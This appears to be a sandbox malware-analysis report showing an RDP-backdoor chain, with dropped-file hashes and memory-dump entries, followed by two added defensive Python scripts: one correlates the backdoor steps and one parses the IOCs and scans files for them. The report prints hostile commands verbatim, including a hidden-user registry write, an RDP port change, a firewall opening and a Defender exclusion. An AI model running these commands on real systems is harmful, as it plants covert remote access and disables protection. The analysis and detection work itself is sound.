          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
          4⤵
          • Hide Artifacts: Hidden Users
          PID:2240
        • C:\Windows\system32\reg.exe
          reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
          4⤵
          PID:296
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:1644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          PID:2500
        • C:\Windows\system32\timeout.exe
          Timeout /t 15
          4⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:2348
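
The chain of child processes above is a compact RDP-backdoor playbook: a local account is added to Remote Desktop Users, password expiry is switched off with `net accounts /maxpwage:unlimited`, the account is hidden from the logon screen through `SpecialAccounts\UserList`, the RDP listener is moved to 13389, a matching inbound firewall rule is opened, and Defender is told to ignore `Program Files`. Any one of those steps is routine admin work; the combination on one host within minutes is not. The Python below is an added example and not part of the sandbox report: it runs a per-host correlation over constructed process-creation records (the `time`/`host`/`cmd` field names are my own, not the Windows 4688 schema) whose command lines are copied from the tree, ties the new `PortNumber` to the firewall rule's `localport`, and only raises a finding when at least three distinct steps land on the same host inside a ten-minute window.

```python
"""Correlate the RDP-backdoor setup steps seen in this report across
process-creation records.  Added example; record layout is hypothetical."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rule table: tag -> regex run over the lower-cased command line.  The named
# "port" group lets the RDP listener change be tied to the firewall rule.
RULES = {
    "rdp_group_add": re.compile(
        r'net1?\s+localgroup\s+"?remote desktop users"?\s+\S+\s+/add'),
    "pw_never_expires": re.compile(
        r'net1?\s+accounts\s+/maxpwage:unlimited'),
    "hidden_user": re.compile(
        r'reg\s+add\s+"?hklm\\software\\microsoft\\windows nt\\currentversion'
        r'\\winlogon\\specialaccounts\\userlist"?.*\s/d\s+"?0+"?'),
    "rdp_port_change": re.compile(
        r'reg\s+add\s+"?hklm\\system\\currentcontrolset\\control\\terminal server'
        r'\\winstations\\rdp-tcp"?\s+/v\s+"?portnumber"?.*\s/d\s+(?P<port>\d+)'),
    "fw_allow_inbound": re.compile(
        r'netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow.*dir=in.*localport=(?P<port>\d+)'),
    "defender_exclusion": re.compile(r'add-mppreference\s+-exclusionpath'),
}
WINDOW = timedelta(minutes=10)   # how close the steps must be on one host
MIN_TAGS = 3                     # distinct techniques needed before alerting


def classify(cmdline):
    """Return (tag, port_or_None) for the first rule that matches, else None."""
    low = cmdline.lower()
    for tag, rx in RULES.items():
        m = rx.search(low)
        if m:
            return tag, m.groupdict().get("port")
    return None


def correlate(records):
    """records: iterable of dicts with 'time' (ISO 8601), 'host', 'cmd'.
    Returns {host: finding} for hosts reaching MIN_TAGS distinct tags in WINDOW."""
    by_host = defaultdict(list)
    for r in records:
        hit = classify(r["cmd"])
        if hit:
            by_host[r["host"]].append((datetime.fromisoformat(r["time"]), hit[0], hit[1]))
    findings = {}
    for host, events in by_host.items():
        events.sort(key=lambda e: e[0])
        best = set()
        for i, (t0, _, _) in enumerate(events):          # sliding window per start event
            tags = {tag for t, tag, _ in events[i:] if t - t0 <= WINDOW}
            if len(tags) > len(best):
                best = tags
        if len(best) < MIN_TAGS:
            continue
        rdp_port = next((p for _, tag, p in events if tag == "rdp_port_change"), None)
        fw_ports = {p for _, tag, p in events if tag == "fw_allow_inbound"}
        findings[host] = {
            "tags": sorted(best),
            "rdp_port": rdp_port,
            # the firewall rule was opened for exactly the new RDP listener port
            "fw_matches_rdp_port": rdp_port is not None and rdp_port in fw_ports,
        }
    return findings


# Constructed records; the WIN7-LAB command lines are copied from the process tree.
SAMPLE_RECORDS = [
    {"time": "2024-12-22T18:17:01", "host": "WIN7-LAB", "cmd": "net localgroup Remote Desktop Users MENVELaJIp /add"},
    {"time": "2024-12-22T18:17:01", "host": "WIN7-LAB", "cmd": r"C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add"},
    {"time": "2024-12-22T18:17:02", "host": "WIN7-LAB", "cmd": "net accounts /maxpwage:unlimited"},
    {"time": "2024-12-22T18:17:03", "host": "WIN7-LAB", "cmd": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f'},
    {"time": "2024-12-22T18:17:04", "host": "WIN7-LAB", "cmd": r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f'},
    {"time": "2024-12-22T18:17:05", "host": "WIN7-LAB", "cmd": 'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389'},
    {"time": "2024-12-22T18:17:06", "host": "WIN7-LAB", "cmd": 'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"'},
    # benign admin work on another host: a single rule hit, below threshold
    {"time": "2024-12-22T09:00:00", "host": "HELPDESK-01", "cmd": 'netsh advfirewall firewall add rule name="Printer" protocol=TCP action=allow dir=in localport=9100'},
]

if __name__ == "__main__":
    for host, finding in correlate(SAMPLE_RECORDS).items():
        print(host, finding)
```

The threshold and window are deliberately loose; the point is that `rdp_port_change` plus a firewall rule for the same port, or a `SpecialAccounts\UserList` write, should weigh far more than a lone `net localgroup`, and a real deployment would score the tags rather than count them.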

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Downloads

                                                            • C:\Program Files\RDP Wrapper\autoupdate.bat

                                                              Filesize

                                                              12KB

                                                              MD5

                                                              b365fde3be7855f4254d1e4bba45d260

                                                              SHA1

                                                              b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

                                                              SHA256

                                                              2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

                                                              SHA512

                                                              d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

                                                            • C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                              Filesize

                                                              115KB

                                                              MD5

                                                              3b18b58b5b9d32e1e8dc3d4f681227cd

                                                              SHA1

                                                              fd328b70f225a372903a3b36567779891f39dc32

                                                              SHA256

                                                              79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf

                                                              SHA512

                                                              ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                              Filesize

                                                              342B

                                                              MD5

                                                              21a7571e8fd4e2f681f0d814986fb433

                                                              SHA1

                                                              d514853c5dfecac165658159c35780dc3c171bd0

                                                              SHA256

                                                              b3fee1668d9622666a61a62033cfee0dd66aabf25ebb930557133b7068624c84

                                                              SHA512

                                                              f429512740f1440ef22c7e3b0fc6c4b8d04fc539e3ffc055352ac8a3266a8c7805964737d220eb50648c84a836a5801c2b436a4773335485547388bd9901d11b

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\IZBf.exe

                                                              Filesize

                                                              112KB

                                                              MD5

                                                              17567f841e0839a64a23f57f10ecc464

                                                              SHA1

                                                              61d1bdb90dce2493c0d0c8c6fe826fdab2f14bb4

                                                              SHA256

                                                              09fd43e052a13d5624d70c32e921e93bf366682fe7f218c1ec015b892b7b13e5

                                                              SHA512

                                                              746f3f9d78e7bbafa0cadd8a7ed7b8f6a1fac639cc6488fe39f866ab7b34d93c5dda00a02528b3a1ae7b42ab52895740d3309a67898acd449be31121b17e192b

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\LXOi.exe

                                                              Filesize

                                                              393KB

                                                              MD5

                                                              4699072b245bd2c2a22b7d08aecdf82d

                                                              SHA1

                                                              08261c8982d46e39b59e685e47df442b42f97f10

                                                              SHA256

                                                              24b5befb7bb4b85ef61f8f86c878f508e5f1716f3de03abe183939c2dd115e8b

                                                              SHA512

                                                              a32ed45751392698d20434ab8f849819832e10cd859a929216f8516cd8933cf52813319a7eab703bc45736def5c67f5e974a07b02c7e459a11aadc915b5c336c

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\bruto

                                                              Filesize

                                                              542KB

                                                              MD5

                                                              05151f488f7e6ade25f0b1dc17c0291d

                                                              SHA1

                                                              aae7feac5765450eff7c5b1c0d5300c2e1ecef3a

                                                              SHA256

                                                              58ef678cd87678a30de6f8955886c4e92c73253d23e6b3d86ca3786d5fd712f5

                                                              SHA512

                                                              eab7bd839c5f1d229cd1b1fa473572df345584483209a7b10f7aaac827e7489eaafd3d5f165ec63172596e7994b7da216027c7bc8cfdccabde8cfe2114aff4fc

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\brutos

                                                              Filesize

                                                              394KB

                                                              MD5

                                                              020ca8399d5809c0d0324133e4b8b1b1

                                                              SHA1

                                                              0ac8b5e0244c45c75daac033da1028b9de551162

                                                              SHA256

                                                              a9aa4bfc661a27fd8df576f9f931ce7889e549ac04d3bbef6f7f9408aa14c5c6

                                                              SHA512

                                                              1023e9724fdb2aa00b5ee41c2b537d784cae90dbc761cfd0202e388ceb7272ab98be3bae324cada2ebe739692216f2967d65433486227c950419d0420802fe08

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dera

                                                              Filesize

                                                              564KB

                                                              MD5

                                                              7042c42ab11714412914232b8aca6487

                                                              SHA1

                                                              fbdbaba75d22e47214312c5357848f00fbd17ea2

                                                              SHA256

                                                              5fb9b33be8bfeefb598d25b9bfdb4c5c1fba0f99bd14d3c2963ab5de183c3a02

                                                              SHA512

                                                              fdcaf5242aa1e6b47ccf6b28c3039bc66de6a13c08217fc4e72ab286badd5a1837ac6870f22e700c98143118a4810a08d1d86be8f3f7031e69bc9b5dcb6b1c5d

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\deras

                                                              Filesize

                                                              410KB

                                                              MD5

                                                              76f84f6090c115e35b4e170f2fb47a9a

                                                              SHA1

                                                              85b23daf1b5a2ad43e54c03f4bd2eec701abd6e2

                                                              SHA256

                                                              8935bdab7e61ec529e2cac9ded1190433d2ec4784bbe2724fd3665d193ddafd4

                                                              SHA512

                                                              86fba86dc7ffbee71c9647289524b06d551492e45ce31bd3cf1b0ef12f8d4e3a7644dc06d3b1ec1583c2238316c4b73fe326d4f6b6042a543d1cd61575038e5f

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com

                                                              Filesize

                                                              872KB

                                                              MD5

                                                              c56b5f0201a3b3de53e561fe76912bfd

                                                              SHA1

                                                              2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                              SHA256

                                                              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                              SHA512

                                                              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gogrF.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              17e2cb0d15de28e402662a9ee7af2b87

                                                              SHA1

                                                              1c10cdcd7c4359aa1b35ec4ce12fd42bedb1a1a9

                                                              SHA256

                                                              b0369d44fb6aa6601968f8cc2c5e948495673043334f89256a0ab784f29c5621

                                                              SHA512

                                                              9216342f4bddf0bb8b9a5c8b9523203a0f0c97f07e6327cd688cf55c4a38972b421f1f248f83bbdf256ded9f465a3e82afa537a7c785cc0812ce789651d58444

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sfera

                                                              Filesize

                                                              577KB

                                                              MD5

                                                              4276f85d94bfc0401a32dd4119d8269b

                                                              SHA1

                                                              28c8b34aa1e02814ea41abe73dc57fb33786a9d6

                                                              SHA256

                                                              c11a11e949b86148708d59fbbb5bb0bcdbb6c07b96cd90a028fac5a6a814698b

                                                              SHA512

                                                              7de9a9e003c3f6cb6e824a61963de7962634d8cda54015ffe1c0d46c79e2546e6286a75460d64f540905e1019bd538909e670877e030d2269619fe7edc5dfd0a

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sferas

                                                              Filesize

                                                              420KB

                                                              MD5

                                                              cfe03a0d90005edbb9302a43fe66efae

                                                              SHA1

                                                              0dbc9b31d86eb4f66e96c1d68e72e2553a5a8ffc

                                                              SHA256

                                                              bd42c6ee6346e9d78e9d804f739cf04db9284a9b79180b7940bdc60deb1ae5a4

                                                              SHA512

                                                              1788559a23b8b109c0291e7198cd52e2ff13eeaafb0ffe8a8a241ec93f9286faa62fdd1ee237c398084d1629f1bf635055a4648702f39fd6606596156979ec6b

                                                            • C:\Users\Admin\AppData\Local\Temp\Cab5543.tmp

                                                              Filesize

                                                              70KB

                                                              MD5

                                                              49aebf8cbd62d92ac215b2923fb1b9f5

                                                              SHA1

                                                              1723be06719828dda65ad804298d0431f6aff976

                                                              SHA256

                                                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                              SHA512

                                                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                            • C:\Users\Admin\AppData\Local\Temp\Tar5556.tmp

                                                              Filesize

                                                              181KB

                                                              MD5

                                                              4ea6026cf93ec6338144661bf1202cd1

                                                              SHA1

                                                              a1dec9044f750ad887935a01430bf49322fbdcb7

                                                              SHA256

                                                              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                              SHA512

                                                              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                            • C:\Users\Admin\AppData\Roaming\CLNT.vbs

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              e2412243518e6670139e6a1ab6f86a11

                                                              SHA1

                                                              b5b55e61279bfea17414d17af75dd6800ffb97c6

                                                              SHA256

                                                              ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762

                                                              SHA512

                                                              3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6

                                                            • C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              5ff23e46d99aea2886555651887a5f1b

                                                              SHA1

                                                              a8dabb15f3834317e1b8ff8b4675dccb672eb55b

                                                              SHA256

                                                              0629895c6da5fb4a09b0832214572c7c6d5058be6f29c3f6061bd0ad428794cf

                                                              SHA512

                                                              5cfd167c876b1be893ec037515c1e36adfe3d78ac51186b262f57499b2acb026d7201debf18c84c66a8f3d98df3558536d99100ab2da442669c2a367d945b5be

                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FG22KLT6XWV9V9SXAMTR.temp

                                                              Filesize

                                                              7KB

                                                              MD5

                                                              47bd771c86416c685e98910eac3c88d0

                                                              SHA1

                                                              191e225474381b5cd590b8ca04c32ce0a08bb9d2

                                                              SHA256

                                                              3e3227861f101f7ac35dcc0fc5b1c94ebe7552a84651dd29c13ac49cce7d37b3

                                                              SHA512

                                                              714666c43b438074d412b066654fd44c116b5e679457d6885d66c61883e35f45cbf5cf0734b23b97d16bbf0fb6cb122745291780ef4b52404063c5e7f4e287ce

                                                            • C:\Users\Admin\AppData\Roaming\OwDsV.vbs

                                                              Filesize

                                                              4KB

                                                              MD5

                                                              0ce9c2c01d781e4a0fcf2be7c18df9b5

                                                              SHA1

                                                              37a8fe63332b0d96be6855692048f4509f7fdc48

                                                              SHA256

                                                              c01364b56cb8008a431239a9a70a041c81b177fa4f0b257fb4a8573110daaf4c

                                                              SHA512

                                                              4cd537ac76ff4c93f84354b21f3dbc2b7e7deea8e695a28363bcf28a2aead439fbabd5ea6a268b115aa7f7ed1c0c17219383af8aaab3dcc39fa4e8d9f075c413

                                                            • C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              fd5bdb9de205580a5b1cbbee5a115c93

                                                              SHA1

                                                              aca041af337daea9a28292a0bc47ddf65de924a0

                                                              SHA256

                                                              0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f

                                                              SHA512

                                                              0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d

                                                            • C:\Users\Admin\AppData\Roaming\ieql.vbs

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              193242114c1738d0ea04aa93659fdd5a

                                                              SHA1

                                                              a929cc1cfbe44ba8a99117dfd7819776ab45d465

                                                              SHA256

                                                              c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

                                                              SHA512

                                                              46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

                                                            • C:\Users\Admin\AppData\Roaming\jJF.dll

                                                              Filesize

                                                              927B

                                                              MD5

                                                              3881787870694df47afe9bb3619f735e

                                                              SHA1

                                                              8acafdeba3ba1e1420ae84447ff02dfe3b187124

                                                              SHA256

                                                              554c290a7739bf67f60f867c51b58472ccb2bf98e78f7300c139b02de0a139a5

                                                              SHA512

                                                              87a32557de46cb4a25091e4aefe8f02c552162d163559d84dcb3c5aeca62a87e9da90614d6c8848951db8b9bc6717bce5af57c53a27cf2168572ea9ed808b55d

                                                            • C:\Users\Admin\AppData\Roaming\jJF.dll

                                                              Filesize

                                                              923B

                                                              MD5

                                                              186776970b2ee5ca4352a53b20e2f21c

                                                              SHA1

                                                              2ffeaf1f95748a9d0496c378ac0a40ca15518233

                                                              SHA256

                                                              a1d443766374f39776ff191fb86cf802e41091e0f161803a904dfee4bdc00a36

                                                              SHA512

                                                              879761172682aa095a55404e90cde86602342f4b78ae95d3cb1ef81ccac4dd64894d143f3d471110fafed33ea7e9f4dff2343e8201057191c042f3b9a5e0235a

                                                            • C:\Windows\System32\catroot2\edb.log

                                                              Filesize

                                                              64KB

                                                              MD5

                                                              80cc04587686785162ff673ba6511483

                                                              SHA1

                                                              ac23d39515d2bf17dae5f1ef6ae5505e38f31398

                                                              SHA256

                                                              fabc6c6b706a439d1b4f1697891bfd5edf21d59649f35dc868f1e7204cff611b

                                                              SHA512

                                                              ae7bf2ac332cc9a3fba6164992cb3b6ee41f2743b1e6d1d9bff405819164d97526970d006e9ae3663bdc7901875d4421115ebde3447ab377fb4085096ac7b8c7

                                                            • C:\Windows\System32\null

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              9a09d8e6794b47d40c8bf8f91e0cd4b4

                                                              SHA1

                                                              f47086004a03a508585c63571beee963e1b4dfb8

                                                              SHA256

                                                              4a6aba17fc23aaa042e71febe17da1955a2eb8550be965fda455601690a4cb15

                                                              SHA512

                                                              a61a1a424d9ded322b5313a01c10df1fe431d7ba61cebee64b0c6c79e9a2cf4c19f2ce9475a13ecd16cab8b34c5f6d19c564ca345f3f0d9daa13180722b6bebf

                                                            • C:\Windows\System32\null

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              bb635f66e1adedd1c2c127c348c3dd13

                                                              SHA1

                                                              73939555bca882af7879c045ab15518e8dd634fc

                                                              SHA256

                                                              b8afacac814e7c113948b5a7d1f4eaf96e1bf599f04375d604338b2c0f1cee6b

                                                              SHA512

                                                              393d91ef094e89497baab8dcee044f0d775829ca2ad5663032894eb4073ddf71ebf6a8003553df2103f3b56a3330b2595d4a02f170af0ce13252876283772e8e

                                                            • \Program Files\RDP Wrapper\RDPWInst.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              3288c284561055044c489567fd630ac2

                                                              SHA1

                                                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                              SHA256

                                                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                              SHA512

                                                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                            • \Program Files\RDP Wrapper\rdpwrap.dll
                                                              Filesize: 114KB
                                                              MD5: 461ade40b800ae80a40985594e1ac236
                                                              SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
                                                              SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
                                                              SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                            • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe
                                                              Filesize: 42KB
                                                              MD5: 38bb4505707fdc7e45266cdc81c0544a
                                                              SHA1: 27474c9b0d555ab4f10ee1445a917d4e947a4538
                                                              SHA256: 2520a93fe9530212b2a49e1b131bf7ac273cf6b90950cefa0e60b4c962868dc4
                                                              SHA512: e34ff3fe10593e70e44b131a9a8274994ffd07462e6764d5fcd18e1b6bec89a577783d8f1c3481b5c3a098f8c282c03b282506dd805fe06d7c79644898773159

                                                            • memory/992-307-0x0000000000400000-0x000000000056F000-memory.dmp
                                                              Filesize: 1.4MB

                                                            • memory/1540-334-0x000000001B560000-0x000000001B842000-memory.dmp
                                                              Filesize: 2.9MB

                                                            • memory/1540-335-0x0000000002A60000-0x0000000002A68000-memory.dmp
                                                              Filesize: 32KB

                                                            • memory/1568-289-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-302-0x0000000001360000-0x0000000001361000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-255-0x0000000000DB0000-0x0000000000DC0000-memory.dmp
                                                              Filesize: 64KB

                                                            • memory/1568-249-0x0000000000BF0000-0x0000000000C00000-memory.dmp
                                                              Filesize: 64KB

                                                            • memory/1568-268-0x0000000000E20000-0x0000000000E21000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-270-0x0000000000E50000-0x0000000000E51000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-277-0x0000000000EC0000-0x0000000000EC1000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-284-0x0000000000E80000-0x0000000000E81000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-287-0x0000000000D20000-0x0000000000D21000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1568-298-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/1592-128-0x0000000000400000-0x000000000056F000-memory.dmp
                                                              Filesize: 1.4MB

                                                            • memory/2064-191-0x0000000000400000-0x000000000056F000-memory.dmp
                                                              Filesize: 1.4MB

                                                            • memory/2116-104-0x0000000000400000-0x0000000000412000-memory.dmp
                                                              Filesize: 72KB

                                                            • memory/2444-58-0x0000000000080000-0x00000000000E7000-memory.dmp
                                                              Filesize: 412KB

                                                            • memory/2444-63-0x0000000000080000-0x00000000000E7000-memory.dmp
                                                              Filesize: 412KB

                                                            • memory/2444-61-0x0000000000080000-0x00000000000E7000-memory.dmp
                                                              Filesize: 412KB

                                                            • memory/2500-360-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
                                                              Filesize: 2.9MB

                                                            • memory/2500-361-0x00000000020D0000-0x00000000020D8000-memory.dmp
                                                              Filesize: 32KB

                                                            • memory/3000-65-0x0000000000080000-0x00000000000A0000-memory.dmp
                                                              Filesize: 128KB

                                                            • memory/3000-54-0x0000000000080000-0x00000000000A0000-memory.dmp
                                                              Filesize: 128KB

                                                            • memory/3000-56-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
                                                              Filesize: 4KB

                                                            • memory/3000-57-0x0000000000080000-0x00000000000A0000-memory.dmp
                                                              Filesize: 128KB

                                                            • memory/3036-186-0x0000000000400000-0x000000000056F000-memory.dmp
                                                              Filesize: 1.4MB
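The dropped-file and memory-dump entries above are the part of this report most useful for hunting on other hosts, but in this plain-text rendering they are awkward to reuse. The following Python is an added example (not the sandbox's code or part of the report): it parses the listing into records, rejects hashes of the wrong length or alphabet, builds a SHA256 lookup, and walks a directory tree comparing file hashes against it. The sample text is constructed here in the report's layout from the rdpwrap.dll and err.exe entries (plus one memory-dump line, which carries only a size); the parser accepts both the label-on-its-own-line rendering and a compact `Label: value` form. The `scan_tree` helper and its command-line usage are assumptions for illustration.

```python
import hashlib
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, Iterator, List, Optional, Tuple, Union

# Constructed sample in the report's plain-text layout: one bullet per artifact,
# then label/value pairs. Hash values are the ones the report lists for these
# two files; the memory-dump entry shows a line that carries only a size.
SAMPLE_LISTING = r"""
• \Program Files\RDP Wrapper\rdpwrap.dll

  Filesize

  114KB

  MD5

  461ade40b800ae80a40985594e1ac236

  SHA1

  b3892eef846c044a2b0785d54a432b3e93a968c8

  SHA256

  798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

  SHA512

  421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

• \Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe
  Filesize: 42KB
  MD5: 38bb4505707fdc7e45266cdc81c0544a
  SHA1: 27474c9b0d555ab4f10ee1445a917d4e947a4538
  SHA256: 2520a93fe9530212b2a49e1b131bf7ac273cf6b90950cefa0e60b4c962868dc4
  SHA512: e34ff3fe10593e70e44b131a9a8274994ffd07462e6764d5fcd18e1b6bec89a577783d8f1c3481b5c3a098f8c282c03b282506dd805fe06d7c79644898773159

• memory/992-307-0x0000000000400000-0x000000000056F000-memory.dmp
  Filesize: 1.4MB
"""

LABELS = ("Filesize", "MD5", "SHA1", "SHA256", "SHA512")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
INLINE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512):\s*(\S+)$")


@dataclass
class Artifact:
    path: str
    size: str = ""
    hashes: Dict[str, str] = field(default_factory=dict)

    @property
    def is_memory_dump(self) -> bool:
        return self.path.startswith("memory/")


def _store(rec: Artifact, label: str, value: str) -> None:
    """Attach one label/value pair; reject hashes of the wrong length or alphabet."""
    if label == "Filesize":
        rec.size = value
        return
    value = value.lower()
    if len(value) != HEX_LEN[label] or not re.fullmatch(r"[0-9a-f]+", value):
        raise ValueError(f"{rec.path}: malformed {label} value {value!r}")
    rec.hashes[label] = value


def parse_listing(text: str) -> List[Artifact]:
    """Parse the dropped-file / memory-dump listing into Artifact records.

    Handles the extracted layout (label on its own line, value on the next
    non-blank line) and the compact 'Label: value' layout."""
    records: List[Artifact] = []
    pending: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):          # a bullet starts a new artifact
            records.append(Artifact(path=line[1:].strip()))
            pending = None
            continue
        if not records:
            continue                       # text before the first bullet is not table data
        m = INLINE.match(line)
        if m:
            _store(records[-1], m.group(1), m.group(2))
        elif line in LABELS:
            pending = line                 # value follows on the next non-blank line
        elif pending is not None:
            _store(records[-1], pending, line)
            pending = None
    return records


def ioc_index(records: List[Artifact], algo: str = "SHA256") -> Dict[str, Artifact]:
    """Map hash -> artifact for records carrying that hash (memory dumps have none)."""
    return {a.hashes[algo]: a for a in records if algo in a.hashes}


def hash_file(path: Union[str, Path], algo: str = "sha256") -> str:
    """Stream a file through hashlib so large files do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def match_bytes(data: bytes, index: Dict[str, Artifact]) -> Optional[Artifact]:
    return index.get(hashlib.sha256(data).hexdigest())


def scan_tree(root: Union[str, Path], index: Dict[str, Artifact]) -> Iterator[Tuple[Path, Artifact]]:
    """Yield (file, matching artifact) for every file under root whose SHA256 is indexed."""
    for p in Path(root).rglob("*"):
        if p.is_file():
            hit = index.get(hash_file(p))
            if hit is not None:
                yield p, hit


if __name__ == "__main__":
    import sys
    index = ioc_index(parse_listing(SAMPLE_LISTING))
    for found, art in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".", index):
        print(f"{found}  matches dropped file {art.path} ({art.size})")
```

Matching on SHA256 rather than MD5 avoids acting on a collision-prone digest, and the memory-dump entries are kept as records (with `is_memory_dump` set) even though they contribute nothing to the hash index, since their sizes and address ranges are still useful when comparing against a dump taken from a suspect host.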